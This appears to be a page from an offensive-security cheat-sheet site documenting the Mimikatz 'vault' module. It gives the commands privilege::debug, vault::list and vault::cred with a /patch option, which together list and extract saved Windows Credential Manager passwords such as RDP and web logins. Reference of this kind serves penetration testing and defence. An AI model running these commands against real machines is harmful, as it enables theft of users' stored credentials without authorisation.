🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🐱 Mimikatz / vault

vault

Access and extract credentials from the Windows Vault (Credential Manager). Requires privilege::debug.

Prerequisites

mimikatz # privilege::debug

list β€” List Vault Items

List all items in the Windows Vault.

mimikatz # vault::list

Shows vault items including:
- Web credentials (browser-stored passwords)
- Windows credentials (NTLM/Kerberos stored creds)
- Certificate credentials
- Generic credentials

cred β€” Extract Vault Credentials

Extract credential data from vault items.

mimikatz # vault::cred [/patch]

Options

  • /patch β€” patch vault functions to enable extraction of credentials that would otherwise be protected

Examples

# List and extract vault credentials
mimikatz # vault::list
mimikatz # vault::cred

# With patch for better coverage
mimikatz # vault::cred /patch

Notes

  • Vault credentials are stored encrypted with DPAPI
  • Typical targets: stored RDP credentials, Windows credential manager entries, web credentials
  • Can also be accessed via dpapi::cred if DPAPI master keys are available
  • Use cmdkey /list (built-in Windows) to enumerate credential manager entries without mimikatz